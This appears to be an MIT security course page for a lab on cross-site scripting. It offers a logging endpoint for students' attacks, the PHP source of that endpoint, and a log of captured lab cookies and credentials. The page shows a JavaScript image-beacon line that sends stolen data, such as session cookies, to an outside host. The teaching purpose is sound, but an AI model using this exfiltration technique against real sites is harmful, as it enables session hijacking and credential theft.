You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.5660/2023/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Mon, 03 Jun 2024 12:17:10 -0400: Iluvata8: grader/TBEBJKEESRGR Mon, 03 Jun 2024 12:16:38 -0400: Iluvata5: PyZoobarLogin=grader#422f1b0471041b0b67eb640b9cd20654ce171298c2e0e8cab2e2b8e9e9cad71e Mon, 03 Jun 2024 12:16:30 -0400: Iluvata4: PyZoobarLogin=grader#091f680c1b49e64c92f6008ed9bc4262dd23d1c30ca0ce1cd2d339f3a2827a84 Mon, 03 Jun 2024 12:16:15 -0400: Iluvata2: PyZoobarLogin=grader#bd538664767dcda10343af9ae21e7462ec8f2831b8ec2241cce563b98fd40f68 Wed, 29 May 2024 12:18:52 -0400: Iluvata-chal: grader/IADILURVUXTK Wed, 29 May 2024 12:18:40 -0400: Iluvata8: grader/UHRIVBCJYFUT Wed, 29 May 2024 12:18:32 -0400: Iluvata8: grader/FIMHWDQVSDPE Wed, 29 May 2024 12:18:06 -0400: Iluvata5: PyZoobarLogin=grader#eed9a5e52395413ab2c305a39b711e784a1da9f418f26ae9ce8cea221065eaf1 Wed, 29 May 2024 12:17:59 -0400: Iluvata4: PyZoobarLogin=grader#b13b7fdf2b4df70fb3f8db3a96bc59bbf6a4d7a2270d33d35cf543fb4ac90080 Wed, 29 May 2024 12:17:44 -0400: Iluvata2: PyZoobarLogin=grader#dc9811be7d6db75947660c19ebb0d5d742ad9c217a117da8758c62c86db7431b Wed, 29 May 2024 12:12:39 -0400: Iluvata8: 234ssed/fs3w2a Wed, 29 May 2024 12:11:48 -0400: Iluvata8: 2343/23423 Wed, 29 May 2024 12:11:30 -0400: Iluvata8: 2343/23423 Wed, 29 May 2024 12:11:08 -0400: Iluvata8: 2343/23423 Wed, 29 May 2024 12:07:26 -0400: Iluvata8: se/fee Wed, 29 May 2024 11:21:16 -0400: Iluvata8: jyc/123 Wed, 29 May 2024 11:20:46 -0400: Iluvata9: jyc/123 Wed, 29 May 2024 11:19:57 -0400: Iluvata9: jyc/234 Wed, 29 May 2024 11:19:08 -0400: Iluvata9: zmy/123 Tue, 28 May 2024 16:22:38 -0400: Iluvata9: fese/fee Tue, 28 May 2024 16:22:21 -0400: Iluvata9: fese/fwex Tue, 28 May 2024 16:20:02 -0400: Iluvata-chal: qeeee/12322 Tue, 28 May 2024 16:16:16 -0400: Iluvata9: jyc/2342 Tue, 28 May 2024 16:15:56 -0400: Iluvata9: jyc/123 Tue, 28 May 2024 16:09:35 -0400: Iluvata8: jyc/123 Tue, 28 May 2024 16:08:16 -0400: Iluvata8: jyc/123 Tue, 28 May 2024 16:06:35 -0400: Iluvata8: jyc/123 Tue, 28 May 2024 16:02:56 -0400: Iluvata-chal: grader/DCAOPJLXPIFA Tue, 28 May 2024 16:02:45 -0400: Iluvata8: grader/RJQXDFVVCSUL Tue, 28 May 2024 16:02:38 -0400: Iluvata8: grader/XBJSLVBNWKYF Tue, 28 May 2024 16:02:13 -0400: Iluvata5: PyZoobarLogin=grader#00c384aa1df2d5833c3a6ccb3ad82fc5f544353d4eba8cc385d1696cc768998c Tue, 28 May 2024 16:02:05 -0400: Iluvata4: PyZoobarLogin=grader#c68f6ffd9dff92615c568b828c0949985826363b242b1e20fc6b65a3e0626f2a Tue, 28 May 2024 16:01:53 -0400: Iluvata2: PyZoobarLogin=grader#5b7e282a23e1069ba828527d46ee1705d5a42463228b441cf398095f248a70b5 Tue, 28 May 2024 15:59:33 -0400: Iluvata-chal: were/eeee Tue, 28 May 2024 15:08:27 -0400: Iluvata8: qwer/qwer Tue, 28 May 2024 14:55:15 -0400: Iluvata8: jyc/123 Tue, 28 May 2024 14:49:37 -0400: Iluvata8: jyc/123 Tue, 28 May 2024 14:49:17 -0400: Iluvata8: jyc/1234 Tue, 28 May 2024 14:48:39 -0400: Iluvata8: jyc3/123456 Tue, 28 May 2024 14:47:59 -0400: Iluvata8: jyc2/12345 Tue, 28 May 2024 14:47:05 -0400: Iluvata8: jyc1/1234 Tue, 28 May 2024 14:46:42 -0400: Iluvata8: jyc1/1234 Tue, 28 May 2024 14:46:33 -0400: Iluvata8: jyc1/1234 Tue, 28 May 2024 14:46:10 -0400: Iluvata8: jyc1/1234 Tue, 28 May 2024 14:46:02 -0400: Iluvata8: jyc1/1231 Tue, 28 May 2024 14:41:55 -0400: Iluvata8: jyc/123 Tue, 28 May 2024 14:21:21 -0400: Iluvata8: jyc/123 Tue, 28 May 2024 13:51:28 -0400: Iluvata5: PyZoobarLogin=grader#8366a7af80f923d8f3d5f9252eb28cab15fac8127be71c0a9f939f8a6c4c285c Tue, 28 May 2024 13:51:19 -0400: Iluvata4: PyZoobarLogin=grader#fed3e69c877d94d5387e812616ceead4ade5dc300b22f7b207310ffe8e5e6765 Tue, 28 May 2024 13:50:57 -0400: Iluvata2: PyZoobarLogin=grader#f5741ef6353eb11d53ed0082a0b33b6724c2990f76187d2f1d1f7741393b981d Tue, 28 May 2024 13:45:27 -0400: Iluvata5: PyZoobarLogin=grader#d3ba86aa23481cec65fea93153321aeb38565a4b64fea3770f24020ba10d9572 Tue, 28 May 2024 13:45:21 -0400: Iluvata4: PyZoobarLogin=grader#b7fc469d82d210a1f0fd45422a9a78b4bfd4b48364d58d701d97cfa4ad6c96b2 Tue, 28 May 2024 13:45:07 -0400: Iluvata2: PyZoobarLogin=grader#fb96bd67529b7b7df4030ca990726513cf5c296cea67a2372047830b6746cc22 Tue, 28 May 2024 13:15:59 -0400: Iluvata5: PyZoobarLogin=grader#3a4dec551597e6cc80e58fe788bf2db3b5b3f03663d2ef9a81ba0f1a545d95bc Tue, 28 May 2024 13:15:51 -0400: Iluvata4: PyZoobarLogin=grader#6b80be4d1016f602fa42002ed95da94348030edc25a7c192d549754cacc20c45 Tue, 28 May 2024 13:15:34 -0400: Iluvata2: PyZoobarLogin=grader#2b7ea105a1aa5016b5442d8f46dc814484c56457d94d95b8d44d9ef01f8d9881 Tue, 28 May 2024 08:34:41 -0400: Iluvata5: PyZoobarLogin=grader#bb9362fcb516db3da8c27e9fe2e842a5e08f13eb6d00a6330e22857866c82360 Tue, 28 May 2024 08:34:35 -0400: Iluvata4: PyZoobarLogin=grader#2369696d1c21a11e57abdc0ad221f9a65a2e72586fa0d409b61dd78a06b4da2a Tue, 28 May 2024 08:34:20 -0400: Iluvata2: PyZoobarLogin=grader#6bcf2890b797a535b5014ffb4244d2890ceee38b737fef13b605cf92a10a62c1 Tue, 28 May 2024 08:30:03 -0400: Iluvata5: PyZoobarLogin=grader#450692ff9e7f9a6c4f22c2b91f3fbf048885a39dde100512a62cac3665581dfb Tue, 28 May 2024 08:29:55 -0400: Iluvata4: PyZoobarLogin=grader#8061568cd245666e7bcf65dbdd8f676f5b894f7bce111ff095e6ad8f0eb9e2b4 Tue, 28 May 2024 08:29:41 -0400: Iluvata2: PyZoobarLogin=grader#7ea95dd55ae0d1770bccf43bd58fe6ec91eac3e229a33aaa08e3022996725f29 Tue, 28 May 2024 08:24:39 -0400: Iluvata5: PyZoobarLogin=grader#7562b8b1c0718fef68192ae46e3be90799cdabe2bb6d4a01fcc3f009c34c575d Tue, 28 May 2024 08:24:32 -0400: Iluvata4: PyZoobarLogin=grader#0f23ced70e9aa9c09aeea6937e2ffbbcde81b22ee615515b780ba15b8ae70003 Tue, 28 May 2024 08:24:17 -0400: Iluvata2: PyZoobarLogin=grader#97d3bf7b01cec5fdd33e431c6b3275a3ad0074902af820617cc112e20228f103 Tue, 28 May 2024 08:22:34 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:22:27 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:22:20 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:21:09 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:21:03 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:20:56 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:19:57 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:19:39 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:19:31 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:19:05 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:10:45 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:10:03 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:09:41 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:06:13 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:02:05 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 08:01:38 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 07:59:07 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Tue, 28 May 2024 07:56:56 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178 Mon, 27 May 2024 14:35:52 -0400: Iluvata: PyZoobarLogin=grader#f7754a74aa93e7f5594297087967f2e482bc2943b8cb5b818894c88672893dc4 Mon, 27 May 2024 14:34:10 -0400: Iluvata: PyZoobarLogin=jyc#40647e25aba3751620f07b7ef51023bbb17bd2cbce51a3fbccca9b944d5a6fdd Mon, 27 May 2024 14:32:08 -0400: Iluvata: PyZoobarLogin=jyc Mon, 27 May 2024 14:27:56 -0400: Iluvata: some-stringaaa Mon, 27 May 2024 14:22:26 -0400: my-username: some-string Mon, 27 May 2024 14:17:53 -0400: my-username: some-string Mon, 27 May 2024 14:17:40 -0400: Iluvata: some-string Mon, 27 May 2024 14:15:37 -0400: my-username: some-string
In case you are curious, here is the source code of this page.
<?php
header("Access-Control-Allow-Origin: *");
do {
if (!array_key_exists("id", $_REQUEST)) {
break;
}
$id = $_REQUEST['id'];
if (strlen($id) > 1000) {
header("HTTP/1.0 413 Payload Too Large");
echo "ID value is larger than 1000 bytes";
return;
}
if (!array_key_exists("payload", $_REQUEST)) {
header("HTTP/1.0 400 Bad Request");
echo "No payload given";
return;
}
$payload = $_REQUEST['payload'];
if (empty($payload)) {
header("HTTP/1.0 400 Bad Request");
echo "Empty payload given";
return;
}
if (strlen($payload) > 1000) {
header("HTTP/1.0 413 Payload Too Large");
echo "Payload is larger than 1000 bytes";
return;
}
if (!function_exists('apcu_add')) {
header("HTTP/1.0 501 Not Implemented");
echo "APCu not enabled, so no rate limiting; refusing all requests";
return;
}
if (apcu_add($payload, true, 5) === false) {
// exact same $payload was sent in the past 5 seconds
header("HTTP/1.0 429 Too Many Requests");
echo "That exact payload was sent very recently; rejecting";
return;
}
$payload = str_replace(array("\n", "\r"), '.', $payload);
$id = str_replace(array("\n", "\r"), '.', $id);
$file = fopen("/tmp/6.5660-2023-logger.txt", "c+");
if ($file === false) {
header("HTTP/1.0 503 Service Unavailable");
echo "Failed to open log file";
return;
}
if (!flock($file, LOCK_EX)) {
header("HTTP/1.0 503 Service Unavailable");
echo "Failed to lock log file";
return;
}
$lines = array();
while (!feof($file) && count($lines) < 100) {
$lines[] = fgets($file);
}
ftruncate($file, 0);
rewind($file);
fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
foreach ($lines as &$line) {
fwrite($file, $line);
}
flock($file, LOCK_UN);
fclose($file);
echo "Logged!";
return;
} while(0);
$link = "(new Image()).src="
. "'https://css.csail.mit.edu/6.5660/2023/labs/log.php?'"
. " + 'id=my-username'"
. " + '&payload=some-string' + '&random='"
. " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="labs.css" />
<title>Lab 4 Logging Script</title>
</head>
<body>
<h1>Lab 4 Logging Script</h1>
<p>
You can use this server side script to extract data from
client-side JavaScript. For example, clicking this client-side
hyperlink will cause the server to log the payload:
</p>
<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
<p>
The random argument is ignored, but ensures that the browser
bypasses its cache when downloading the image. We suggest that you
use the random argument in your scripts as well. The ID argument
will help you distinguish your log entries from those sent by other
students; we suggest picking your MIT Athena username. Newlines are not
allowed in <tt>javascript:</tt> links; if this bothers you, try
<a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>
<h2>Test form</h2>
<p>
If you just want to try out the script, you can use this form.
(For your actual attacks in lab 4, you'll probably want to use the
JavaScript image technique shown above.)
</p>
<form method="GET" action="">
<label for="id">ID:</label><br />
<input name="id" placeholder="your-mit-username" size="40" />
<i>(some identifier to locate your payload in the log)</i>
<br />
<br />
<label for="payload">Payload:</label><br />
<input name="payload" placeholder="some-string" size="40" />
<i>(the information you stole)</i>
<br />
<input type="submit" value="Log" name="log_submit" />
</form>
<h2>Logged entries</h2>
<p>
Below are the most recent logged entries, so that you can check
if your attack worked:
</p>
<pre class="tty"><?php
$lines = file_get_contents("/tmp/6.5660-2023-logger.txt");
echo htmlspecialchars($lines);
?></pre>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>